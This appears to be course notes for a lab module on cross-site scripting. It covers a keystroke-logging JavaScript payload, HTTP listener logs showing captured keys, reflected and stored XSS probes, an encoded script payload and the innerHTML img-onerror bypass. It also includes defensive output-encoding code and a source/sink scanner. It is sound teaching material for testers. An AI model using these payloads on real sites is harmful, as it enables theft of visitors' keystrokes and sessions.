Module 5: Cross-Site Scripting Introduction and Discovery

Introduction to the Sandbox

Accessing the Sandbox

Start the VPN, then start the VM and add its IP address to the hosts file.

Understanding the Sandbox

Explaining the sandbox webpage.

JavaScript Basics for Offensive Uses

Syntax Overview

Function example

// Take an object with an `items` array and print each entry
function processData(data) {
  data.items.forEach(item => {
    console.log(item)
  });
}

// Sample input: the object shape processData expects
let foo = {
  items: [
    "Hello",
    "Zdravo",
    "Hola"
  ]
}

processData(foo)

Useful APIs

Logging inputs
logKey function
Capturing Keystrokes
Typing into Eval

Starting HTTP listener

kali@kali:~$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
Using fetch

HTTP Server Log

kali@kali:~$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
172.16.174.4 - - [11/Aug/2021 19:15:53] "GET /hello HTTP/1.1" 404 -

Original Keylogging Payload

// Print the key name of every keydown event to the console
function logKey(event){
  console.log(event.key)
}

// Register the handler on the whole document so every field on the page is covered
document.addEventListener('keydown', logKey);
Sending keystrokes back

HTTP Server Log

...
192.168.121.101 - - [11/Aug/2021 19:23:39] "GET /k?key=I HTTP/1.1" 404 -
192.168.121.101 - - [11/Aug/2021 19:23:39] code 404, message File not found
192.168.121.101 - - [11/Aug/2021 19:23:39] "GET /k?key= HTTP/1.1" 404 -
192.168.121.101 - - [11/Aug/2021 19:23:39] code 404, message File not found
192.168.121.101 - - [11/Aug/2021 19:23:39] "GET /k?key=l HTTP/1.1" 404 -
192.168.121.101 - - [11/Aug/2021 19:23:40] code 404, message File not found
192.168.121.101 - - [11/Aug/2021 19:23:40] "GET /k?key=i HTTP/1.1" 404 -
192.168.121.101 - - [11/Aug/2021 19:23:40] code 404, message File not found
192.168.121.101 - - [11/Aug/2021 19:23:40] "GET /k?key=k HTTP/1.1" 404 -
192.168.121.101 - - [11/Aug/2021 19:23:40] code 404, message File not found
192.168.121.101 - - [11/Aug/2021 19:23:40] "GET /k?key=e HTTP/1.1" 404 -
...

Cross-Site Scripting - Discovery

Reflected Server XSS

Often found where user input supplied in a GET parameter (a search field, for instance) is echoed straight back into the response.

Searching for "offsec"
Inspecting "offsec"

The term is reflected inside a <div> tag, so it may be exploitable. Probe with plain HTML injection first (a <b> or <h1> tag, for example): it is less error-prone than a script payload, and although rendered markup does not guarantee that JavaScript will execute, it is a strong indicator that the output is not being encoded.

Injecting HTML to Search
Search Alert box

Encoded search payload

search.php?s=%3Cscript%3Ealert(0)%3C/script%3E
XSS rendered on Victim - Search
Reviewing HTTP Response in Burp Suite
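The reflection behind search.php?s=... above, as an added example and not the sandbox's own server code: the target is PHP, but to keep this page's examples in one language the handler is written as a Node-style function. `renderSearchVulnerable`, `renderSearchSafe`, `htmlEscape` and `reflectsMarkup` are names chosen here; the vulnerable form concatenates the decoded parameter into the results <div> exactly as observed, and the hardened form entity-encodes it for the HTML text context it lands in.

```javascript
// Added example, not the target's code: the reflected-search pattern, vulnerable and fixed.

// Entity-encode the five characters that matter in an HTML text or attribute context.
const ESCAPES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;" };
function htmlEscape(s) {
  return String(s).replace(/[&<>"']/g, (c) => ESCAPES[c]);
}

// Pull `s` out of the query string as the server sees it: percent-decoded. A leading '?'
// is tolerated, and a missing parameter yields the empty string.
function searchTermFromQuery(query) {
  return new URLSearchParams(query).get("s") ?? "";
}

// Vulnerable: the decoded term is dropped straight into the markup of the results <div>,
// so %3Cscript%3E arrives as a live <script> element.
function renderSearchVulnerable(query) {
  const s = searchTermFromQuery(query);
  return `<div class="results">Results for: ${s}</div>`;
}

// Hardened: encode on output, in the context where the value is written. The browser still
// displays the literal text the user searched for, but it is no longer parsed as markup.
function renderSearchSafe(query) {
  const s = searchTermFromQuery(query);
  return `<div class="results">Results for: ${htmlEscape(s)}</div>`;
}

// Discovery check: does the response carry the probe back as live markup? This is the
// automated version of the "inject <h1>, look for a rendered heading" step.
function reflectsMarkup(response, probe) {
  return response.includes(probe);
}
```

Running the encoded payload from above through both renderers shows the difference: the vulnerable response contains `<script>alert(0)</script>` verbatim, the hardened one contains `&lt;script&gt;alert(0)&lt;/script&gt;`.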

Stored Server XSS

Leaving a comment
Blog Comment Inspection
Sanitized Comment
Inspecting Sanitized Comment
Raw HTML of Comment
H1 in Username
Rendered H1
XSS payload in Blog Comment
Executing XSS Payload using Target User Browser

Reflected Client XSS

Survey Home Page
Survey HTML Injection
Finding Request in the Network Tools
Viewing the Response Payload
Reviewing Survey.js
Payload not executing in Client XSS
Reviewing Injection Point

Mozilla's innerHTML Bypass

Browsers do not execute a <script> element that is inserted through innerHTML, which is why the <script> payload fails at this injection point. An element with an event-handler attribute fires as soon as it is parsed, so MDN's own example uses a broken image:

const name = "<img src='x' onerror='alert(1)'>";
el.innerHTML = name; // el is the element being written to; the alert fires when the image fails to load
Exploiting with Mozilla's Bypass
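The "Reviewing Survey.js" and "Reviewing Injection Point" steps above are a manual read of the client-side code for where a URL parameter is written into the page. This added example (not part of the course material) automates that first pass: `reviewClientSource` scans JavaScript source for DOM sources that carry attacker input and for sinks that turn a string into markup or code, and attaches the payload caveat that applies to each sink. SAMPLE_SURVEY_JS is a constructed stand-in, since the real Survey.js contents are not on this page.

```javascript
// Added example: a first-pass sink/source review for client-side XSS discovery.

// Places attacker-controlled data enters the page.
const SOURCES = [
  { name: "location.search", re: /\blocation\.search\b/ },
  { name: "location.hash", re: /\blocation\.hash\b/ },
  { name: "URLSearchParams", re: /\bnew\s+URLSearchParams\b/ },
  { name: "document.referrer", re: /\bdocument\.referrer\b/ },
];

// Places a string becomes markup or code, with the payload consequence for each.
const INNERHTML_NOTE = "a <script> inserted this way does not execute; use an event handler, e.g. <img src=x onerror=alert(1)>";
const SINKS = [
  { name: "innerHTML", re: /\.innerHTML\s*=/, note: INNERHTML_NOTE },
  { name: "outerHTML", re: /\.outerHTML\s*=/, note: INNERHTML_NOTE },
  { name: "insertAdjacentHTML", re: /\.insertAdjacentHTML\s*\(/, note: INNERHTML_NOTE },
  { name: "document.write", re: /\bdocument\.write(?:ln)?\s*\(/, note: "<script> does execute when written during parsing" },
  { name: "eval", re: /\beval\s*\(/, note: "input runs as JavaScript; no HTML needed" },
];

// Walk the source line by line and report every source and sink hit with its line number.
// textContent / innerText assignments are deliberately not flagged: they never create markup.
function reviewClientSource(src) {
  const findings = [];
  src.split("\n").forEach((line, i) => {
    for (const s of SOURCES) {
      if (s.re.test(line)) findings.push({ line: i + 1, kind: "source", name: s.name, text: line.trim() });
    }
    for (const s of SINKS) {
      if (s.re.test(line)) findings.push({ line: i + 1, kind: "sink", name: s.name, note: s.note, text: line.trim() });
    }
  });
  return findings;
}

// Constructed sample standing in for Survey.js (not the sandbox's actual file).
const SAMPLE_SURVEY_JS = `
const params = new URLSearchParams(location.search);
const name = params.get("name");
document.getElementById("greeting").innerHTML = "Hello, " + name;
document.getElementById("safe").textContent = name;
`;
```

A source hit followed by a sink hit on the same variable is the candidate injection point; the sink's note tells you which payload shape to try, which here is the reason the <script> payload failed and the <img onerror> one succeeded.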

Stored Client XSS

Summary of Answers
HTML in Survey
Rendered HTML in Survey
XSS Payload in Survey
Alert Box on Result Page
Alert Box in Victim's Browser
